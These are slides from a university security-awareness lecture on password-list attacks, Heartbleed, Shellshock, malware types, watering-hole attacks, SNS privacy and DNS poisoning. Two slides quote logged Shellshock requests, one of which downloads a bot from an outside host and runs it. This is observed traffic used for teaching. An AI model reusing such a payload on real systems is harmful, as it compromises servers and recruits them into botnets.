lecture about network and host security to nii students
TRANSCRIPT
Securing your IT
EnvironmentHASEGAWA Akiumi
Dept. of Information Engineering
School of Engineering
Chukyo University
Why I interested in the Security field.
Last midnight of the last day of 20th century, I got an e-mail from US-CERT(United States Computer Emergency Response Team).
On the day, we were monitoring our system behavior for Y2K problem.
The e-mail asked us to shut down machines which were attacking American universities from our university network.
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem of DNS
Concluding remarks
between “internet” and “the Internet”
“internet” is a term of expressing the concept of connecting networks.
The Internet is a global system of interconnected computer networks that use the standard Internet protocol suite (TCP/IP) to link several billion devices worldwide.
“The Internet” is not Web, Email, and so on. They are applications on IP networks.
Most famous keywordCIA
C for Confidentiality
only intended authorized person can access to the information
I for Integrity
maintaining and assuring the accuracy and consistency of data over its entire life-cycle
A for Availability
Authorized person can access the information anytime she/he wants
Another keywordAAA
A for Authentication
identifying a user
A for Authorization
allow the authenticated user to access services
A for Accounting
log the activities of users
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
Current or on going problems
Security trends
from Ministry of Internal Affairs and Communication
Current/On going problems
Trends in security threat
http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html
Malware trend 2011 - 2013
http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.htm
Top 10 Security Threats in this year
http://www.soumu.go.jp/johotsusintokei/whitepaper/ja/h26/html/nc143210.html
RANK TYPE of THREAT AIM of ATTACK
1 Spear phishing by E-Mail information theft
2 unauthorized computer access information theft
3 Website tampering or compromising information theft, Denial of service
4 information leakage from website information theft
5 online banking attacks information theft
6 mal-application for smart phones information theft
7 unintended privacy/information leakage in SNS
8 information leakage by lost mobile hardwares
9 ransom ware a like information theft
10 Denial of Services Denial of services
Topics in last year
ID and password system is about to die
Severe bugs in Major Open Source Softwares
Severe problems in DNS system/protcol was exposed!
SSL(Secure Socket Layer) is about dying
Watering hole attacks
compromised GOM player site
compromised EmEditor site
Spear attacks
Sony Picture Entertainment
ICANN
ID and Password system is about to die.
Brute force attacks
using randomly generated string
Dictionary attacks
using a list/lists of commonly used passwords
Password list attacks
using a list of pairs of ID and password disclosed from some other services
This type of attacks is very successful.
known password list attacks
starting date Target Success Attacks Success Rate
Nov. 2013 to Feb. 2014 Ticket Pia ? ? ?
5th, Feb. mixi 370
28th, Feb. mixi 16972
27th, May to 4th, June niconico 219926 2203590 9.98%
31st, May to 17th, June mixi 263596
19th, June to 23rd,June Ameba 38280 2293543 1.7%
23rd,June to 24th, June CAPAT 11502 ? ?
28th, June to 29th, June Bandai-Namco 14399 1796629 0.8%
1st, July to 28th, July Pointalk, goo 1265 ? ?
13th, Aug. MUJI 無印良品 20957 4220382 0.5%
15th, Aug. Suica point club 756 296000 0.3
22nd, Sep. to 23rd, Sep. MUJI 無印良品 19 18663 0.1%
25th, Sep. to 26th, Sep. Kuroneco members 10589 1900000 5.6%
27th, Sep. to 29th, Sep. docomo ID 6072 22500000 0.3%
28th, Sep. Sagawa Express 34161 ? ?
Line account Hijacking and fraud
Line account hijacking is notable this year.
also in Skype accounts are targeted.
Hijackers ask friends to buy i-tunes cards instead of them and tell their numbers.
the activities seem to be organized and controlled by existing scenarios.
Line decides to introduce pin code to avoid such attacks.
Purpose of such attacks
for Money or their economy?
professionals said “No, may be”.
They pointed out that direct monetary damages occurred in only two cases.
It is said that attackers check the completeness of the lists they have.
So, what comes next to these attacks?
News on Line account hijacking
http://news.yahoo.co.jp/pickup/6143059
Do’s and Don’ts in account management
Don’ts
use easy ID and password
share ID and password among services
Leave PC without logout or screen lock
Do’s
if possible, use 2 stage authentication
if not available, use strong password and memo it in some hidden place.
screen lock or logout before leaving your seat
defects found in widely used systems
OpenSSL severe bugs
known as heart bleed
raw data in server memory can be disclosed
SSL 3.0 problem
known as poodle
encryption can be decoded
DNS cache poisoning problem
root can be compromised
defects found in widely used systems
bash has a severe bug(known as shell shock, 24 Spet.)
Web servers with CGI
affect NAS(Network Attatched Storage) and home routers
ntpd has a severe bug disclosed in this December
for MacOS, hot fix was released
This bug may affect home routers
Samba problems(NAS)
affect NAS(Network Attached Storage)
Observed Shell shock Attack
Thu, 25 Sep 2014 02:41:59 GMT
209.126.230.72
-
GET / HTTP/1.0
Accept: */*
Host: () { :; }; ping -c 23 209.126.230.74
Referer: () { :; }; ping -c 11 209.126.230.74
User-Agent: shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
Cookie: () { :; }; ping -c 17 209.126.230.74
Observed Shell Shock Attack
Sun, 28 Sep 2014 03:01:27 GMT
195.140.188.254
-
GET / HTTP/1.0
Host: 150.42.6.190
User-Agent: () { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"
Do you have broadband routers ?
Check the configurations ASAP.
Change administration password.
Operation manual can be download from manufactures site.
Some of old routers have http port opened to the Internet, and the configurations can be modified by Web.
If you use WiFi routers, do not use WEP!
WEP has severe defects in its design.
attack tools are available.
Emergency patch is necessary for Allied-
Telesis routers and switches
Basic software of home routers has severe bug! disclosed lately
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
Classification of Malware
Virus
Worm
Trojan horse
Spyware/Adware
Ransomware/Cryptware
Computer Virus
A computer virus is a software which tries to copy itself to files or application programs. If the action is successful, the computer is said infected.
As side effects, it may destroy files, system, display messages, or spy information.
It spreads as an attachment of email, or through compromised web pages.
Computer Worm
A computer worm is a standalone program to replicate itself to other computers through networks.The famous song tells that “an inchworm is measuring the marigolds”. And computer worms propagate like such worms.Wether it harms the system or not, its activity of replication maybring heavy congestion to the Internet.
Trojan HorseA Trojan horse is a software which includes malicious codes in it.
It looks like a useful/convenient application.
After infection, it may collect critical information to send,open backdoors to the Inter-net to access or gain controlof the system.
Spyware/AdwareA spyware is a software to gather information to send outside the system. It may be installed with a installation of free softwares with/without the consumer’s consent.
An adware is a software to display ads while using it. Such software is useful and free of charge, but it often bothers users by displaying advertisements.
Ransomware/Cryptware
Such software is installed when you click “yes” to a red popup alert which says that “Your system is infected”.
It gets control of the screen and displays “pay money” to delete it. It may encrypt files and request money to get keys to decode files.
Watering hole attack
Watering hole attackAttackers observe the behaviors of victims where they visit for information.
Exploit the target Web site based on the above observation
When users visit the compromised site, malware will be installed into the victims’ PCs.
Attackers gain controls over those PCs.
Typical Cases of Watering hole attack
GOM player distribution site
GOM player distribution site was compromised
PCs in the “Monju” Nuclear reactor site were compromised via GOM player update. Is installing GOM player allowed???
EmEditor update site
automatic update site of EmEditor compromised
No harm may be, because the downloader works when accesses come from specific IPs.
ISC.ORG compromised lately
The ISC recommends to those who access the site during compromise to scan their machines for malware.
The ISC is the main distribution site of sendmail, bind, and so on.
Agenda
Keywords in Security
Current trends in security
Current topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
to avoid malware infection
Software update every month
but not on black Tuesday(in Japan, its Wednesday), wait several days or a week.
anti-malware is necessary!
Windows8 has “windows defender” as default
Private firewall is needed.
block inward connection
check outbound connection also!
Do not open attachments of email so easily
Do not say “yes” to pop up alerts of software instantly!
Easy to say but not easy to do!
anti-malware/personal firewall may do harm
false negative problems
may allow intrusion or infection.
virus total site is helpful when you get a file/files in doubt.
false positive problems
blocks necessary communication.
erase or quarantine necessary files.
false positivefalse negative
http://marginalrevolution.com/marginalrevolution/2014/05/type-i-and-type-ii-errors-simplified.html
false positive is harmful
Routers of my office and home are same bland.
My office to my home is 30 minites drive.
Release my mobile PC from my office LAN.
I connect my mobile PC to my home LAN, my personal firewall blocked all connection because of compromise of the router. And way of unlocking is not present.
My friend’s case
She updates her Firefox.
After update, she starts the Firefox agin.
She saw a pop up querying yes or no, and she clicked “yes” almost instantly.
And she has lost web connection ever.
Firefox seems compromised.
for your safety block connection
Yes/No
recommended tools for web surfing
check wether the site is using EV-SSL, especially in using online banking.
useful addons for browsers
Request policy for Firefox
Netcraft tool bar
WOT(Web of Trust) useful for Googlers
useful WEB page
Virus totalhttps://www.virustotal.com/
sample of phishing site
E-Mail handlingHTML format is risky
embedded scripts
embedded Web links
phishing is done by sending email which includes faked link.
phishing for WebMail account information is increasing.
Be care of attached files
zip encoded file is dangerous
if necessary, scan by anti-malware and “virus total” before open file.
spam or phishing mail may come from your friends
Can we find malware infection?
It is difficult to find malware infection!
Modern? malware works quietly to avoid disclosure of its existence.
Types and number of malware is increasing day by day.
Anti-malware vendors have difficulty in catching newly developed malware.
in case of malware infectionDo’nts
hide that your PC is infected.
Continue using the infected system.
Use “System Restore” function for recovery
in case of malware infectionDo’s
Stop using the infected computer!
Call the incident response team or the person in charge of the network system of your section and wait his/her for suggestions!
Safe recovery procedure from infection
1. format hard disk(not quick format)
2. install system from read-only media
3. patch it
4. recover data from backup
1. backups can be contaminated.
Recovery fromSystem troubles
MacOS
TimeMachine is helpful
Windows 7
System Restore
System Recovery
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
SNS problems
Privacy problems
Cyberstalking
Flaming
a tweet can cause flaming
Sexting/Revenge porn
A leakage to the Internet is unrecoverable!
Stalking case in Zushi
The murder made querying tweets to SNS to get victim’s address.
He was also using popular FAQ site for victim’s address.
He was also using a private detective.
Zushi case on a newspaper
Don’ts in using SNSdisclose geological information or other private matters
check EXIF of digital photo
retweet or reply to asking someone’s address or private information
post private photo of yours or your friends
see more, refer to this site
Agenda
Keywords in Security
Current trends and topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem of DNS
Concluding remarks
the Basic problem on the Internet
DNS is a protocol and system to convert domain names to IP address.
Ill configured or ill managed home routers can be easily compromised. Intruders may change DNS server configuration. It happened in Mexico.
DNS poisoning is easy.
send fake query and at the same time generate and send fake answers.
If poisoned, users of poisoned server could be led to the fake server. And you can imagine what happens.
DNS query mechanism
from https://www.nic.ad.jp/ja/newsletter/No40/0800.html
Kamingsky attack
old attack
Kaminsky attack
Agenda
Keywords in Security
Current trends in security
Current topics in IT security
about Malware/malicious Web site
How to avoid malicious activities
SNS problems
the Basic problem on the Internet
Concluding remarks
Concluding Remarks
Severe problems of the Internet were found in year 2014.
ID and password system may end.
Many new malware and tools are developing daily.
Be careful when you are posting on SNS etc.
Check and care your home routers, network attached storage, TV set, VDR, etc. properly.
Basic knowledge about the Internet technology is important
for your safety